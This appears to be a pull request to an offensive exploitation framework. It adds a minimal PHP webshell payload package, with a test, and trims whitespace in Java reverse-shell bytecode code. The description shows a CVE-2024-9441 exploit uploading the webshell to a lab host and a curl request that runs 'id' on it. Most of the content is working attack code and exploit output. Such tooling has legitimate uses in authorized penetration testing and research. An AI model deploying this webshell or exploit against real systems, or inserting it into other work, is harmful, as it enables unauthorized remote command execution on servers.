### PR TITLE
Added an extremely minimal PHP GET webshell

### DIFF
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -227,8 +227,6 @@ func ReverseShellBytecode(conf *config.Config) (string, string) {
 
 	return reverseShell, classString
 }
-
-
 // This is the Java bytecode for a reverse shell. You can find the source code here:
 //
 // https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a
@@ -641,8 +639,6 @@ func ReverseShellScriptingEngineBytecode(conf *config.Config) (string, string) {
 		"\x00\x00\x00\x06\x00\x01\x00\x00" +
 		"\x00\x72\x00\x01\x00\x53\x00\x00" +
 		"\x00\x02\x00\x54"
-	
- 
 
 	classSize := make([]byte, 2)
 	classString := transform.Title(random.RandLettersRange(8, 17))

--- a/payload/webshell/php.go
+++ b/payload/webshell/php.go
@@ -1,0 +1,6 @@
+package webshell
+
+// A very basic PHP webshell using short tags and no error checking.
+func (php *PHPWebshell) MinimalGet() string {
+	return "<?=`$_GET[0]`?>"
+}

--- a/payload/webshell/webshell.go
+++ b/payload/webshell/webshell.go
@@ -1,0 +1,12 @@
+// Webshell payloads
+//
+// The webshell package contains webshell payloads that can be dropped onto remote targets
+package webshell
+
+type Dropper interface{}
+
+type (
+	PHPWebshell struct{}
+)
+
+var PHP = &PHPWebshell{}

--- a/payload/webshell/webshell_test.go
+++ b/payload/webshell/webshell_test.go
@@ -1,0 +1,14 @@
+package webshell_test
+
+import (
+	"testing"
+
+	"github.com/vulncheck-oss/go-exploit/payload/webshell"
+)
+
+func TestVerySmallHTTPGET(t *testing.T) {
+	phpPayload := webshell.PHP.MinimalGet()
+	if phpPayload != "<?=`$_GET[0]`?>" {
+		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
+	}
+}


### PR DESCRIPTION
I used this with CVE-2024-9441:

```
albinolobster@mournland:~/initial-access/feed/cve-2024-9441$ ./build/cve-2024-9441_linux-arm64 -e -rhost 10.9.49.18 -rport 80
time=2024-10-03T12:55:46.110-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.18 port=80 ssl=false "ssl auto"=false
time=2024-10-03T12:55:46.110-04:00 level=STATUS msg="Attempting to upload the webshell to img/index.html"
time=2024-10-03T12:55:47.303-04:00 level=STATUS msg="Testing if the webshell was uploaded to http://10.9.49.18:80/img/index.html"
time=2024-10-03T12:55:48.204-04:00 level=SUCCESS msg="Minimal webshell dropped to http://10.9.49.18:80/img/index.html"
time=2024-10-03T12:55:48.206-04:00 level=SUCCESS msg="Example usage: curl -kv http://10.9.49.18:80/img/index.html?0=id"
time=2024-10-03T12:55:48.206-04:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
albinolobster@mournland:~/initial-access/feed/cve-2024-9441$ curl -kv http://10.9.49.18:80/img/index.html?0=id
*   Trying 10.9.49.18:80...
* TCP_NODELAY set
* Connected to 10.9.49.18 (10.9.49.18) port 80 (#0)
> GET /img/index.html?0=id HTTP/1.1
> Host: 10.9.49.18
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: PHP/5.6.23
< Content-type: text/html; charset=UTF-8
< Content-Length: 31
< Date: Tue, 12 Dec 2023 06:09:58 GMT
< Server: lighttpd/1.4.22
< 
uid=1002(lighttpd) gid=0(root)
```